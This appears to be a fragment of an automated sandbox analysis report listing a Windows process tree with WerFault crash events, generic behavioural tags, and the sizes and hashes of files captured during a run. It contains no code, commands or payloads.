C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:4216
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p1⤵PID:5112
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4264
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4264 -s 8562⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2676
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3796
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2460
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2452
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2396
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:1884
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2016
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1916
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1500
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1368
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1040
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:424
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:752
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:952
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:5008 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2472 -ip 24722⤵PID:1628
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 940 -ip 9402⤵PID:1660
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 476 -p 4264 -ip 42642⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3204
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 580 -p 3384 -ip 33842⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2832
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 488 -p 3744 -ip 37442⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4168
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 420 -p 5080 -ip 50802⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1116
-
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:4556
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:3472
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:2556
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Modifies data under HKEY_USERS
PID:4164
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:4496
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3744
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3744 -s 4922⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4240
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:5080
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5080 -s 7802⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5104
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
35KB
MD5a5f9de1afb2ce09cd58dcd9fa0f07661
SHA1f3a787dfae568bfb04c2c8890bb0b4453f1a93b9
SHA256a2161e7af83264dfb9cef4b82835a86aac48df3e3d0cdba33f40016644b96f61
SHA5125d7e5ec5d34ece0efe932fe16b893f097abd1bbac94c2333bd05571ed6e5d158a9649b1ab5094d35590f1e2e99f87168d693ffc1820306b44bfe6baa379d431e
-
Filesize
13KB
MD505425fb2df8812ebce2d115d83b4594a
SHA19f515a04713ebec7fdcfac4db85c7aeb8bfdc7b9
SHA25638cc0a29023675f7212a4b0cee0ce226d44e8e111ca958204352f570fac811c8
SHA51243e06f6aefb067f6e2de529719d1a91a4f3193857004e9f147d4259525942b0e933324c88cff9f20830a2c4d97183daffd174dca6b44a6b1a404dfac0c123249
-
Filesize
35KB
MD58ab4673392964d0e58f969e61a0bef89
SHA1216ca63e6b3698e764704209a9fee6c5fee511f6
SHA2564984063dd67898340cc85fd43af2ace7e8c6aebe07af299c258e0861f8df8739
SHA512f31cbc85e31250599e7065e1d01c6d4cbd7366764c393dd7eb1d7acc87ed8ad2abe837bbadebdca771f6a722c1ec9f31585b52fa7c508819c8957287024be940
-
Filesize
13KB
MD5808aac6e8b81c38135f0ad5532afa2c8
SHA1054c74649970949ebaf0bfed37a28c313b82c381
SHA256a6b6583520450c9d76e7cdaa82d6d802ebeda262f575072973d14cf1a66e9cfb
SHA51238bb3860c375df85f140a72a4a1fe13adc0a13dbbd9bdae1fc78c3b4dc54c40eb9d0085f688a885f927521b0f6730b3db498a5275b4a1bfc2ac57a6f6c24db08
-
Filesize
37KB
MD57b5d9858a72c5f9f78f1239765efddcd
SHA1c524292b3450092b7e736e7312a0a29a162d1192
SHA256ab5f5fc0bc8c9fb99c442127c74d5228db9abbda2679f0268e532e18506391ef
SHA512e813fa08f57c23f74c8169a3f3b5e731e601cdd5bbf0bdd370dc6e3bca6328bbb9dcdc2618a2335c518de4347a8dd93af833e2bd916cdd4d27b8d7fcdb14979b
-
Filesize
37KB
MD554c0da8d7bd1d6b252149cc322a9ef28
SHA1cd01cd9163d718d0eb8627d3c50c284be5bdd32c
SHA256c90de362ec9524d80426ca05c7be21960f24c5a58b51b83183e680ce5f8ceb4a
SHA5125defd588a698d9d9437f3ff21dcf711d70e82ba5991a072c3d66f91b5a69d6c461002a1caa220a84f0fd4bdee330402e8f6b4d6b61c4025dbd3c00a5e41fbfab
-
Filesize
13KB
MD5babcb89de9ad4130c05e1fbf3c04b2f3
SHA1534822cc1c1a2f88d6dcfc6342a36521fb1886f2
SHA2563bb115ae37cf1f4e1f8144fd1441cd8b35fc24ab4cfb71f8dec81159df65a268
SHA5128c4ad28f5d84626b18de638d5c8957b3f61111e39151ffc4f9107e38e65bd2bc29548b303f8962bd3fbd39db98c9c6e05f59cc2091f44b11e3b7a2aaf0c1e4d3
-
Filesize
13KB
MD5aa492c6b2468e34c2225ba82a91b6aac
SHA1423636bbe335ec6b6255bbe18b8a00a4b84e69d7
SHA2563fe84ac298396ff9b3f194561fe0ca3541cd9f871dccc0b5bb5b70b453a6890d
SHA5123c1a458b14f7d1c8722bddeeec892a9a70dd0bb9bf1dad9cfa4d92dd1d69011d0ed577f9e5a2d8286a83349d4e115b48b5e28423bec01f861070d0acda633b31
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
226B
MD5916851e072fbabc4796d8916c5131092
SHA1d48a602229a690c512d5fdaf4c8d77547a88e7a2
SHA2567e750c904c43d27c89e55af809a679a96c0bb63fc511006ffbceffc2c7f6fb7d
SHA51207ce4c881d6c411cac0b62364377e77950797c486804fb10d00555458716e3c47b1efc0d1f37e4cc3b7e6565bb402ca01c7ea8c963f9f9ace941a6e3883d2521
-
Filesize
19KB
MD5f146487a400566f838832a371a8b465f
SHA132b40fbed559b613f4e836fbebb19faea88c20b6
SHA25611ab1c1e9b0679a0fd7f867e41f1c6be3d32a0ce1cbf27a6360e2cd529578fa1
SHA512c417670919bf1662955b7a20d20080529f49260ea964b552726d770b2d8a28bb04815d46d10bb5929bb4740d3dc40e9cc44062cf9a351ebc246afb900f7d2bd5
-
Filesize
948B
MD5a7ce8cefc3f798abe5abd683d0ef26dd
SHA1b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e
SHA2565e97dee013313bedacd578551a15e88ed87b381ed8f20755cb929b6358fd020a
SHA512c0d1821252d56e7b7d5b5d83891673f279f67638da1f454fb45e0426315cf07cc54c6df2cf77c65c11bcb3a1e4f574f76a3fb9059fde94951ba99d3de0e98d64
-
Filesize
1.4MB
MD5bb86a343080f9f4696c250ef31a18d9d
SHA143b2193dcb1d56eac73ba88a7b461822074192d6
SHA256095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0
SHA51224807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560
-
Filesize
1.4MB
MD5bb86a343080f9f4696c250ef31a18d9d
SHA143b2193dcb1d56eac73ba88a7b461822074192d6
SHA256095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0
SHA51224807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560
-
Filesize
3.7MB
MD5f5c51e7760315ad0f0238d268c03c60e
SHA185ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
Filesize
3.7MB
MD5f5c51e7760315ad0f0238d268c03c60e
SHA185ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
Filesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
Filesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
Filesize
455KB
MD5ee0ad7cc2a5976a5c658da52092977a9
SHA1c69b99d42a9f9886af74e6a75fd905a5d17d4792
SHA256f0cc93428ff55575086b843e642c33283067a980fc9cb1f17afc3559b101ff1b
SHA512ca7f8b1409156b7d1b143cfb33f64056a8c2a8ce401dc735c82828521922044f86680ca6c1b4b08955689c5ba11c94930fe64cce37258e621c7d47ee2dafea17
-
Filesize
455KB
MD5ee0ad7cc2a5976a5c658da52092977a9
SHA1c69b99d42a9f9886af74e6a75fd905a5d17d4792
SHA256f0cc93428ff55575086b843e642c33283067a980fc9cb1f17afc3559b101ff1b
SHA512ca7f8b1409156b7d1b143cfb33f64056a8c2a8ce401dc735c82828521922044f86680ca6c1b4b08955689c5ba11c94930fe64cce37258e621c7d47ee2dafea17
-
Filesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
Filesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
Filesize
2KB
MD54ac8a26e2cee1347880edccb47ab30ea
SHA1a629f6d453014c9dccb98987e1f4b0a3d4bdd460
SHA256de574c85b289f23bba4b932a4c48397c4c61904cb6df086726dd7f8049624c3a
SHA512fc2af80b2e84ae114ae06144b9ec41eed50250e20f18db3d114ac8d2c59ebbfcd440f59d12f173ea6a94bcf394b0cecee9e120265112b7043bf9e2bd636d6a8a